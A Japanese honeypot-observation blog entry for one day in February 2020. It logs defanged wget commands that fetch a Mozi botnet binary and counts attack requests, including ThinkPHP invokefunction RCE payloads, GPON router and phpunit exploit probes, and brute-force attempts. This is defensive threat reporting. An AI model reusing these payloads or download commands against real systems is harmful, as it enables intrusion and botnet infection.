23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(339日目)

2020/02/20(木)

トータルは310件でした。

ハンティングログは以下です。

222.247.248[.]187 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m
180.115.37[.]105 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m

www.virustotal.com

件数 概要 リクエス
158 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
37 WordPressに対するブルートフォース攻撃 GET /wp-login.php
36 WordPressに対するブルートフォース攻撃 POST /wp-login.php
31 アクセス GET /
21 調査 GET /is_test
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 Gponルータの脆弱性を狙った通信 POST /GponForm/diag_Form?images/
2 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 phpunit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 調査 GET /logs
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 GET /editConfig?returnUrl=/
1 GET /ReportServer
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 WordPressの調査 GET ///wp-json/wp/v2/users/
1 WordPressの調査 GET ///?author=1